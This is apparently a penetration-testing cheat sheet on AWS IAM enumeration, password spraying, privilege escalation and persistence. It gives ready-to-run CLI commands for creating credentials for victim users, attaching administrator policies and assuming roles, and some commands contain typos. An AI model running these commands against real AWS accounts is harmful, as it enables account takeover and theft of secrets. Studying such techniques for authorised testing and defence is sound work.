IAM

IAM privileges - Privesc

Unauthenticated IAM Enumeration

Tools_by_Tyler/aws_unauthenticated_iam_enumeration at main · Ty182/Tools_by_TylerGitHub

IAM User Accounts

AWeSomeUserFinder

GitHub - dievus/AWeSomeUserFinder: AWS IAM Username Enumerator and Password Spraying Tool in Python3GitHub

• Uses UpdateAssumeRolePolicy to identify external IAM users.

python3 AWeSomeUserFinder.py -ak <accesskey> -sk <secretkey> -f -r <username list> -rn <role name> -a <account id>

• Modify S3 bucket policies to enumerate valid IAM users in external accounts

python3 AWeSomeUserFinder.py -ak <accesskey> -sk <secretkey> -f -r <username list> -s3 -b <bucket_name> -a <account id>

Pacu

Pacu

run iam__enums --role-name <your assumed role> --account-id <account id>

IAM Privilege escalation

List inline policies, attached policies and group policies

https://cybr.com/courses/iam-privilege-escalation-labs/cybr.com

AWS IAM Privilege Escalation Techniques - Hacking The Cloud

AWS-IAM-Privilege-Escalation/README.md at master · RhinoSecurityLabs/AWS-IAM-Privilege-EscalationGitHub

GitHub - RhinoSecurityLabs/AWS-IAM-Privilege-Escalation: A centralized source of all AWS IAM privilege escalation methods released by Rhino Security Labs.GitHub

IAM Enumeration Tools

PMapper

GitHub - nccgroup/PMapper: A tool for quickly evaluating IAM permissions in AWS.GitHub

CloudPEASS

GitHub - carlospolop/CloudPEASSGitHub

python3 AWSPEAS.py --profile <AWS_PROFILE> --region <AWS_REGION>

IAMActionHunter

GitHub - RhinoSecurityLabs/IAMActionHunter: An AWS IAM policy statement parser and query tool.GitHub

IAMFinder

GitHub - prisma-cloud/IAMFinder: IAMFinder enumerates and finds users and IAM roles in a target AWS account.GitHub

EnumerateIAM

GitHub - andresriancho/enumerate-iam: Enumerate the permissions associated with AWS credential setGitHub

python3 enumerate-iam.py --access-key [access_key] --secret-key [secret_key] > results.txt

aws_iam_enum

GitHub - unklerunkle/aws_iam_enum: python script to automate the redundancy of some basic aws iam commandsGitHub

python3 iam-enum.py --user-name [username] --profile [profile]

aws_escalate.py

Security-Research/aws_escalate.py at master · RhinoSecurityLabs/Security-ResearchGitHub

python3 aws_escalate.py --user-name [username] --access-key-id [access_key] --secret-key [secret_key]

Pacu

Pacu

Privilege escalation opportunities in IAM configurations

GitHub - tenable/EscalateGPT: An AI-powered tool for discovering privilege escalation opportunities in AWS IAM configurations.GitHub

Multiple privesc vectors

Multiple privesc vectors in a single policy

• lambda:UpdateFunctionConfiguration

• iam:CreatePolicyVersion
• iam:SetDefaultPolicyVersion
• iam:PassRole + ec2:RunInstances: Creating an EC2 instance with an existing instance profile

• iam:CreateAccessKey: Creating a new user access key
• iam:CreateLoginProfile: Creating a new login profile
• iam:UpdateLoginProfile: Updating an existing login profile
• iam:AttachUserPolicy: Attaching a policy to a user
• iam:AttachGroupPolicy: Attaching a policy to a group
• iam:AttachRolePolicy: Attaching a policy to a role
• iam:PutUserPolicy: Creating/updating an inline policy for a user
• iam:PutGroupPolicy: Creating/updating an inline policy for a group
• iam:PutRolePolicy: Creating/updating an inline policy for a role
• iam:AddUserToGroup: Adding a user to a group
• iam:PassRole + lambda:CreateFunction + lambda:InvokeFunction: Passing a role to a new Lambda function, then invoking it
• iam:PassRole + lambda:CreateFunction + lambda:AddPermission

• iam:UpdateAssumeRolePolicy + sts:AssumeRole: Updating the AssumeRolePolicyDocument of a role

• lambda:UpdateFunctionCode: Updating the code of an existing Lambda function

iam:CreateAccessKey

AWS IAM Privilege Escalation – Methods and MitigationRhino Security Labs

An attacker with the iam:CreateAccessKey permission on other users can create an access key ID and secret access key belonging to another user in the AWS environment

aws iam create-access-key --user-name target_user

$ aws iam create-access-key --user-name [Victim-Username] --profile [profile-name] --output text | tee creds.txt 

iam:CreateLoginProfile

AWS IAM Privilege Escalation – Methods and MitigationRhino Security Labs

An attacker with the iam:CreateLoginProfile permission on other users can create a password to use to login to the AWS console on any user that does not already have a login profile setup.

aws iam create-login-profile --user-name [victim-username] --password 'password' --no-password-reset-required --profile [profile]

arn:aws:iam::[Account_ID]:user/[Username]

You can now login as the victim into the AWS console

https://signin.aws.amazon.com/signinsignin.aws.amazon.com

iam:UpdateLoginProfile

aws iam update-login-profile --user-name [victim-username] --password 'password' --no-password-reset-required --profile [profile]

You can now login as the victim into the AWS console - See iam:CreateAccessKey

iam:CreatePolicyVersion

AWS IAM Privilege Escalation – Methods and MitigationRhino Security Labs

Create a new version of an IAM policy that they have access to.

aws iam create-policy-version --policy-arn arn:aws:iam::123456789012:policy/TargetPolicy --policy-document file://path/to/administrator/policy.json --set-as-default

administrator/policy.json

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": "*",
      "Resource": "*"
    }
  ]
}

iam:SetDefaultPolicyVersion

aws iam set-default-policy-version –policy-arn target_policy_arn –version-id v2

Where “v2” is the policy version with the most privileges available.

Example: CloudGOAT - iam_privesc_by_rollback

With Pacu:

iam:AddUserToGroup

aws iam add-user-to-group --group-name [group-name@ --user-name [username] --profile [profile]

iam:AttachUserPolicy

AWS managed policies - AWS Managed PolicyAWS Managed Policy

aws iam attach-user-policy --user-name [username] --policy-arn arn:aws:iam::aws:policy/AdministratorAccess 

If attaching AdministratorAccess fails, try to attach another dangerous permission such as SecretsManagerReadWrite

aws iam attach-user-policy --user-name [username] --policy-arn arn:aws:iam::aws:policy/SecretsManagerReadWrite 

iam:AttachGroupPolicy

aws iam attach-group-policy --group-name [group_attached_to_user] --policy-arn arn:aws:iam::aws:policy/SecretsManager

Also try with AdministratorAccess - See iam:AttachUserPolicy

iam:PutUserPolicy

Create a policy document policy.json

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": "*",
      "Resource": "*"
    }
  ]
}

aws iam put-user-policy --user-name [username] --policy-name test --policy-document file://policy.json

Check if the policy is in place:

$ aws iam list-user-policies --user-name [username]
$ aws iam get-user-policy --user-name [username] --policy-name test

iam:PutGroupPolicy

Create policy.json

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": "*",
      "Resource": "*"
    }
  ]

Upload the policy to your group

aws iam put-group-policy --group-name [group] --policy-name admin --policy-document file://policy.json

iam:AttachRolePolicy

AWS IAM Privilege Escalation – Methods and MitigationRhino Security Labs

Find a role you can assume: "Action": "sts:AssumeRole"

aws iam list-roles

Attach Role Policy

aws iam attach-role-policy --role-name [role_you_can_assume] --policy-arn arn:aws:iam::aws:policy/AmazonS3FullAccess

iam:PutRolePolicy

Find a role you can assume - See iam:AttachRolePolicy

Create policy.json

{
    "Version": "2012-10-17",
    "Statement": [
      {
        "Effect": "Allow",
        "Action": "*",
        "Resource": "*"
      }
    ]
  }

Put the role

aws iam put-role-policy --role-name [role_you_can_assume] --policy-name secretsaccess --policy-document file://policy.json

sts:AssumeRole

AWS Pentest Series Privilige Escalation over IAM (assumerole)Medium

List of IAM roles

aws iam list-roles

Retrieve trust relationship between role and user

aws2 iam get-role --role-name [role-name]

List managed policies attached to the specified role

aws iam list-attached-role-policies --role-name [role-name]

Retrieve information about the specified version of the managed policy

aws iam get-policy-version --policy-arn [policy-arn] --version-id [vid]

Assume role - retrieve temporary security credentials of assumed role

aws sts assume-role --role-arn [role-arn] --role-session-name [sessionname]

Use the credentials

$ export AWS_ACCESS_KEY_ID=[access_key]
$ export AWS_SECRET_ACCESS_KEY=[secret_key]
$ export AWS_SESSION_TOKEN=[session_token]
$ aws sts get-caller-identity

lambda:UpdateFunctionConfiguration

AWS IAM Privilege Escalation - Methods and Mitigation - Part 2Rhino Security Labs

Allow to attach a layer to a function

aws lambda update-function-code --function-name [my-function] --zip-file fileb://my-function.zip

iam:PassRole + lambda:CreateFunction + lambda:InvokeFunction

$ aws lambda create-function --function-name [function-name] --runtime python3.7 --zipe-file fileb://my-function.zip --handle [my-function.handler] --role [role-arn] --region [region]
$ aws lambda invoke --function-name [function-name] response.json --region [region]

Persistence - IAM Role Anywhere

An attacker with sufficient permissions could exploit IAM Roles Anywhere to gain persistent access to an AWS account

MyScripts/AWS/setup_roles_anywhere.sh at main · adanalvarez/MyScriptsGitHub

How Attackers Can Abuse IAM Roles Anywhere for Persistent AWS AccessMedium

Interesting Book

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

• Advanced Penetration Testing: Hacking AWS 2 This book delves deeper into analyzing the security of various AWS services and shows techniques and tactics used by an attacker to breach an AWS environment
• Hands-On AWS Penetration Testing with Kali Linux Set up a virtual lab and pentest major AWS services, including EC2, S3, Lambda, and Cloud